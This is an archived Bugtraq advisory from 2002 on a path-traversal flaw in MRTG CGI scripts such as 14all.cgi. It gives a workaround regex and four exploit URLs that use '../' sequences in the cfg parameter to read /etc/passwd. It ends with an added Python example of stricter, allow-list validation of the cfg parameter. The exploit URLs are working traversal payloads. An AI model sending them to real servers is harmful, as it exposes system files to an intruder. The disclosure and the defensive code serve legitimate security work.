Bugtraq mailing list archives
new advisory
From: "UkR-XblP?" <cuctema () ok ru>
Date: Sat, 02 Feb 2002 04:47:29 +0300
---=== UkR Security Team advisory ===---

Name : MRTG CGI script "show files" Vulnerability

About : The Multi Router Traffic Grapher (MRTG) is a tool to monitor the traffic load on network links. MRTG generates HTML pages containing GIF images which provide a LIVE visual representation of this traffic.

Product vendor : MRTG / http://www.mrtg.org

Problem : The problem lies in incorrect validation of user-submitted (by browser) information, which can show the first string of any file on the system where the script is installed.

Workaround : This will help somewhat: $input =~ s/[(\.\.)|\/]//g;

Author : UkR-XblP / UkR security team

Exploit : http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
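A stricter way to validate the cfg parameter than the character-stripping regex in the workaround above, as an added Python example (not code from the advisory or from MRTG/14all.cgi). The config directory, the allowed name pattern and the assumption that the script joins cfg onto a fixed directory are mine, not the advisory's.

```python
import os
import re

# Python mirror of the advisory's workaround, s/[(\.\.)|\/]//g.
# It is a character class, so it strips every '(', '.', ')', '|' and '/'
# character rather than the sequence "../". That does block traversal, but
# it also mangles legitimate names that contain a dot.
WORKAROUND_RE = re.compile(r'[(\.\.)|\/]')

def strip_workaround(cfg):
    """Apply the advisory's workaround regex to a cfg value."""
    return WORKAROUND_RE.sub('', cfg)

# Assumed config directory and name allow-list (not from the advisory).
CFG_DIR = "/srv/mrtg/cfg"
# First character must be alphanumeric, so "." and ".." can never match,
# and no slash is allowed anywhere.
CFG_NAME_RE = re.compile(r'\A[A-Za-z0-9][A-Za-z0-9_.-]{0,63}\Z')

def resolve_cfg(cfg, base_dir=CFG_DIR):
    """Return the file path to read for a cfg parameter, or None if rejected.

    Allow-list the name first, then confirm as defense in depth that the
    normalised path still sits directly inside base_dir. normpath only
    normalises lexically; the assumption is that base_dir contains no
    symlinks pointing outside it.
    """
    if not CFG_NAME_RE.fullmatch(cfg):
        return None
    base = os.path.normpath(base_dir)
    candidate = os.path.normpath(os.path.join(base, cfg))
    if os.path.dirname(candidate) != base:
        return None
    return candidate
```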
